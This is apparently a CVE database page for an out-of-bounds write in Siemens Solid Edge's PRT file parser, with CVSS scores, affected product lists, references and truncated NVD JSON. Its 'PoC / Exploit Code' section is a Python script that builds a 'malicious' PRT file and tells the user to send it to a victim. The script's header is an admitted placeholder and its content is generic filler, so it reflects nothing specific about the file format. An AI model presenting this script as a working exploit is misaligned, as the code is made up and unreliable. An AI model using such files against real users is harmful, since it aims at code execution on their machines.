CVE-2025-40810

Description

A vulnerability has been identified in Solid Edge SE2024 (All versions < V224.0 Update 14), Solid Edge SE2025 (All versions < V225.0 Update 6). The affected applications contains an out of bounds write vulnerability while parsing specially crafted PRT files. This could allow an attacker to crash the application or execute code in the context of the current process.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:siemens:solid_edge_se2024:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:siemens:solid_edge_se2024:224.0:-:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_0001:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_00010:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_00011:*:*:*:*:*:* - VULNERABLE

Solid Edge SE2024 < V224.0 Update 14

Solid Edge SE2025 < V225.0 Update 6

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-40810 - Solid Edge PRT File Out of Bounds Write PoC
# This PoC demonstrates the concept of crafting a malformed PRT file
# to trigger the out-of-bounds write vulnerability in Solid Edge.

import struct
import sys

def create_malicious_prt(output_path):
    """
    Create a malformed PRT file to trigger OOB write in Solid Edge.
    The vulnerability exists in the PRT parser when handling certain
    data structures without proper bounds checking.
    """
    # PRT file header (simplified representation)
    header = b'\x00' * 16  # File header placeholder

    # Craft a data structure with an oversized length field
    # to trigger out-of-bounds write during parsing
    malicious_length = struct.pack('<I', 0xFFFFFF)  # Intentionally large value
    malicious_data = b'\x41' * 256  # Padding data

    # Combine components to form the malicious PRT file
    payload = header + malicious_length + malicious_data

    with open(output_path, 'wb') as f:
        f.write(payload)

    print(f"[+] Malicious PRT file created: {output_path}")
    print("[!] Send this file to a victim using Solid Edge to trigger the vulnerability")

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <output_prt_file>")
        sys.exit(1)

    create_malicious_prt(sys.argv[1])

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-40810
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-40810
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-40810/
[4] VulDB https://vuldb.com/cve/CVE-2025-40810
[5] https://cert-portal.siemens.com/productcert/html/ssa-541582.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-40810", "sourceIdentifier": "[email protected]", "published": "2025-10-14T10:15:39.760", "lastModified": "2025-10-16T13:56:28.707", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been identified in Solid Edge SE2024 (All versions < V224.0 Update 14), Solid Edge SE2025 (All versions < V225.0 Update 6). The affected applications contains an out of bounds write vulnerability while parsing specially crafted PRT files. This could allow an attacker to crash the application or execute code in the context of the current process."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:-:*:*:*:*:*:*:*", "matchCriteriaId": "893736B3-0140-4775-8700-CB9D7719DDE5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:224.0:-:*:*:*:*:*:*", "matchCriteriaId": "A0119E8F-1FAF-4A3B-B6E9-20F78360FC82"}, {"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_0001:*:*:*:*:*:*", "matchCriteriaId": "829C4AEB-7C8D-408B-A79C-8684753F45E1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_00010:*:*:*:*:*:*", "matchCriteriaId": "8E262AB3-8C47-430A-9D42-89317CB630C5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_00011:*:*:*:*:*:*", "matchCriteriaId": "94758C94-F427-480E-A9F1-109D8660C4E0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_00012:*:*:*:*:*:*", "matchCriteriaId": "D084D11C-08FB-4EEE-A5E3-D93C10103D2A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_00013:*:*:*:*:*:*", "matchCriteriaId": "F8A834C5-1E45-4087-A3A4-C059A2C9960C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_0002:*:*:*:*:*:*", "matchCriteriaId": "1E8FB23E-280D-46FD-BD44-5D4552639E00"}, {"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_0003:*:*:*:*:*:*", "matchCriteriaId": "CA2417A0-DD31-46FC-8D5A-9128B86C9352"}, {"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_0004:*:*:*:*:*:*", "matchCriteriaId": "3CA9C494-767C-4CFA-AB07-106298B7B2C4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_0005:*:*:*:*:*:*", "matchCriteriaId": "C3738D73-82A5-41E4-8083-34611A6301BE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_0006:*:*:*:*:*:*", "matchCriteriaId": "5634352F-0DD1-4731-9E43-61D0A9A40D1B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_0007:*:*:*:*:*:*", "matchCriteriaId": "32E3D549-54F0-4909-830D-BDE8CDAD5AF7"}, {"vulnerable": true, "criteria": "cp ... (truncated)